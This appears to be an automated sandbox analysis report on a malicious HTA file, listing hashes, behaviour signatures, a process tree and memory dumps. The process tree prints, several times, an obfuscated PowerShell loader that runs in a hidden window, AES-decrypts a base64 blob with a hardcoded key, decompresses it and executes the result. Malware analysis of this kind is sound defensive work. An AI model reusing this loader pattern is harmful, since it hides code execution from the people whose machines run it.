Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-01-2024 13:56

General

  • Target

    freorra.hta

  • Size

    1.1MB

  • MD5

    b46fee5771193152ad4e92a2bd75436d

  • SHA1

    5ebc0363b9cfede7ce711e59b9c7bfbe7188a9d1

  • SHA256

    ab6492900c66882416208e9554d85504ad7f7fe6e9674945887bc6ac47ebfdbd

  • SHA512

    8125952c8a04a908d8245da32c77f0a5f6d5e60a925311deb4f24419cf6cd849d36e93e33505a2da2a07672148fd260409d4b34b8e2d49c6120abd27f2ca1e36

  • SSDEEP

    1536:87it7MAZeK2PbPqFBQ04r76oogc2KQ1GLXETTtjIm+lIWFkKI5nPz3iQYgol7VS0:Si6AZr2PbPmBQhru1biXk

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\freorra.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $TXrH = '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';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $TXrH = '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';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $TXrH = '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';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2644

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    0b7dab35f977016b2b725f7005801194

    SHA1

    4ca9989d74b78d42f939155b18aa6248201169fe

    SHA256

    ac727e1be9d2b2f38b5c320626e10f285f18ea6a593709b80468e6b8de6cb529

    SHA512

    3ecb964a6add764b98b168036178de0ed4fd5d1350bb62cd0ecf961d4e524292a3618761139998261ff68082f5c97a33126f8ba690c540f70de56567c6d75399

  • memory/1580-2-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/1580-3-0x0000000001D80000-0x0000000001DC0000-memory.dmp

    Filesize

    256KB

  • memory/1580-4-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/1580-5-0x0000000001D80000-0x0000000001DC0000-memory.dmp

    Filesize

    256KB

  • memory/1580-6-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2644-19-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2644-20-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2644-21-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2644-18-0x0000000002710000-0x0000000002750000-memory.dmp

    Filesize

    256KB

  • memory/2644-17-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2644-35-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2648-22-0x0000000002A40000-0x0000000002A80000-memory.dmp

    Filesize

    256KB

  • memory/2648-24-0x0000000002A40000-0x0000000002A80000-memory.dmp

    Filesize

    256KB

  • memory/2648-23-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2648-25-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB

  • memory/2648-36-0x0000000072040000-0x00000000725EB000-memory.dmp

    Filesize

    5.7MB